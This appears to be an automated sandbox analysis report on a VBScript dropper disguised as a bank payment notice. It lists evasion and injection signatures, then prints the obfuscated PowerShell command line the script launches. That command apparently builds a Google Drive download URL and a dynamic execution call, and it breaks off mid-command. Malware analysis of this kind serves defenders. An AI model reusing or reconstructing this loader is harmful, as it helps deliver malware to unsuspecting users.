Edit tour
Windows
Analysis Report
e-dekont_swift-details.vbs
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 3236 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\e-dek ont_swift- details.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 1132 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Koldblod ig = 1;$Ar bejdskatal ogs119='Su bstrin';$A rbejdskata logs119+=' g';Functio n Hungerle ss($Besnak kelsen){$P hylloxerae =$Besnakke lsen.Lengt h-$Koldblo dig;For($M onsterhood =5; $Monst erhood -lt $Phylloxe rae; $Mons terhood+=( 6)){$Apada na+=$Besna kkelsen.$A rbejdskata logs119.In voke($Mons terhood, $ Koldblodig );}$Apadan a;}functio n toptekst er($Hypogl ottis){& ($Formode) ($Hypoglo ttis);}$Ah istoric=Hu ngerless ' Af,rM,ith soUnconzde sigi,sperl SparelOut, oaDelim/ N eur5Armag. Sinds0.nve n Tanta( F lytW Crami driftnTyph adSurreoFu eliw Samms Sek,u feat hNBromdTSk val Bandc1 over 0Ejen d. M.nn0,o oln;Torde FishWDual iLaighnun. on6 Pudr4S tvfn;Chrom Stivexdeb ar6Grsni4F amul;Dib e forudrKor alvOveri:K u ib1Unawa 2Befar1S.l va.Gri n0a eroc)Jordo DelkrGInv aleGuiltc LoddkFluen o Skat/Zoo li2Desme0M ilit1Morib 0Biote0Afd ra1Dicty0S umma1 Omni UdtaFSk l ei NotorSh arpeUntonf Dybso Ter exZo ie/ G dni1Hyper2 Oscil1 Tvr .Pitch0Pa lin ';$Opv urderings= Hungerless 'pro,hUUn expsAlthie BrugerV ny s-OvertA P al ghlf,ie Fantan.usc ut,craz '; $Sadelmage rvrkstedet =Hungerles s 'Dekr.hT aph tDemod tCir.epGri ndsSciss:F ri s/Kalci /Leucrd Su l,rForskiT a brvbrews eSrgef.Soc kmgAftllos e geoTrans g TukalSup ere Alk..M ercuc Udg o.djunm Pl ur/ FotouB eboecForsa ?Se,laeSju skxE,glipI mmisoChang rSlukntKiv in=Haustd AlleoMa,il w .unlnSyr inlSoluroE jendaS,rue dConti&,mf ariMglerdB ,han=Fladb 1MysidN Fl orwSensaQS hopplHaand XOrrancOve rlqLegenB SaraSI,mun Lmo thzAna p RUn crRN rtfofProto fStere6Bes pap G,ll4A rsenA Mult YWhynePFas ciKLunkhP Be,iRSpira uWasse2Mel leG,nsil0G rund8.ombi -Kr bsiEct roTLag.i ' ;$Inddelin gens=Hunge rless ' In sp>Pi,na ' ;$Formode= Hungerless 'Maalei t i,leSw epx Satel ';$U npark147=' Inferiorit y197';topt ekster (Hu ngerless ' ErnriS Non seForhat,a den- Mi,rC Objeko H d fn hypntSu pereAccorn VarsetIn,l a Super-ma ss.PSlutna ApophtUntr ahdek,n Dr agT Unen:F rilu\Klito G Brugi Sa blgSubsahN illeeHakni . Se,gtund sxLimstt H,ls Mass- AnnyuV Ene ta tyrl K, onuNonpreP o er Bourg $EvovaUBan krnRomanpS joveaSkots rUrostku h um1Broc,4M arin7Wishe ;signa '); toptekster (Hungerle ss 'Pris.i Fllesf.sbe s Udkra( k erot Fewde HofdesMisp otSnowm- F o.lpTimw.a undebtWelt eh All. Su leTEtnol:D elit\g rni GPendlibla dfg I tehp rocoeHamul .ColletBla dexAfsvrtP ,rag)pr,ck {Ur.ereSte pdxTypotiF olket Bord }Myoso;Rac k, ');$Lnt illgs = Hu ngerless ' Longee.tak ncCa,nohZo oloo Moor Anded%Neug raArtisppr emipWe,ted De roa Bol .t belnaBr dty% Gibr\ IndtakT kn oaPyr prAm bilt fryso DigittO.tr aeSterikAu toms Fienk serro mbr erdis utLu fttsHa,nd. ForsvVHemi dr A,trd M ale Ring&U